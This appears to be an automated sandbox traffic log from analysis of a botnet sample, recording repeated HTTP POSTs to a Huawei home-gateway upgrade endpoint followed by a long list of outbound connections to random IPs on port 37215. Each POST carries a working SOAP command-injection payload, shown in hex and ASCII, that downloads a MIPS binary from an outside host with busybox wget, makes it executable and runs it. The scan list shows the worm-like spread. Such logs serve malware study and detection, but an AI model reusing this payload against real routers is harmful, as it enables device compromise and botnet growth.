6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443

Source: global traffic	TCP traffic: 192.168.2.23:41604 -> 37.0.9.202:45
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.170.182.211:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.202.211.211:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.173.156.3:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.12.174.90:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.17.210.61:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.79.199.188:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.173.103.8:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.29.36.203:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.192.232.101:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.240.8.60:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.48.195.180:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.128.146.240:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.112.103.101:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.118.63.44:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.138.35.236:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.97.134.4:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.9.128.78:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.32.150.224:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.44.230.177:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.168.32.235:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.154.152.117:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.141.110.25:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.178.36.204:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.232.207.168:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.100.2.147:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.4.52.171:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.230.207.46:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.100.246.239:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.95.12.197:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.61.187.249:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.124.202.64:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.185.115.36:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.142.51.247:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.213.9.226:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.212.251.211:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.93.26.85:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.160.106.24:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.201.82.220:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.138.216.195:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.219.229.244:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.2.4.90:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.100.115.254:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.222.253.242:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.110.226.106:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.87.217.31:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.141.187.222:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.103.236.208:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.132.232.168:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.201.161.248:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.238.225.135:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.43.102.26:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.34.81.123:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.230.134.116:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.242.207.221:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.12.47.194:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.110.46.119:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.147.255.70:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.27.131.162:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.75.238.231:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.179.249.127:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.131.169.1:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.96.87.135:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.137.90.225:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.193.153.178:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.199.216.216:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.106.243.231:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.135.223.106:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.202.205.14:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.228.195.224:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.63.9.153:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.177.6.111:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.106.112.126:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.19.224.206:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.193.63.210:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.99.171.162:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.90.21.87:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.11.163.174:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.34.124.73:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.72.181.144:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.144.201.226:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.245.112.88:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.77.72.156:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.135.220.189:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.186.181.79:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.105.109.17:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.216.120.34:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.253.121.176:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.106.84.182:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.42.124.80:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.3.203.204:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.181.23.71:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.208.2.141:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.242.198.127:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.44.41.167:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.164.169.167:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.187.114.19:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.45.109.120:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.54.86.157:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.214.136.32:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.176.114.148:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.247.224.83:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.219.164.134:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.194.102.65:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.24.28.4:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.132.138.214:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.148.228.130:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.215.137.127:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.224.113.41:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.130.96.240:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.137.194.208:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.242.203.148:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.48.5.197:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.93.127.64:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.166.198.203:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.162.52.27:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.255.187.175:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.210.62.129:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.30.7.46:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.127.102.214:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.110.121.9:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.59.22.52:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.143.112.24:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.121.7.210:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.237.199.27:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.161.54.130:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.142.195.224:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.147.27.157:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.4.41.108:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.128.235.123:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.198.53.111:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.157.237.132:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.122.47.91:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.91.28.208:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.224.205.79:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.243.2.158:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.179.108.125:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.168.244.6:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.50.136.165:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.72.23.245:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.125.144.120:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.203.157.0:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.196.11.207:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.16.37.118:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.232.67.152:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.69.155.79:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.179.140.28:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.124.157.217:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.83.139.56:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 156.232.227.101:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 41.51.30.51:37215
Source: global traffic	TCP traffic: 192.168.2.23:24598 -> 197.51.56.157:37215
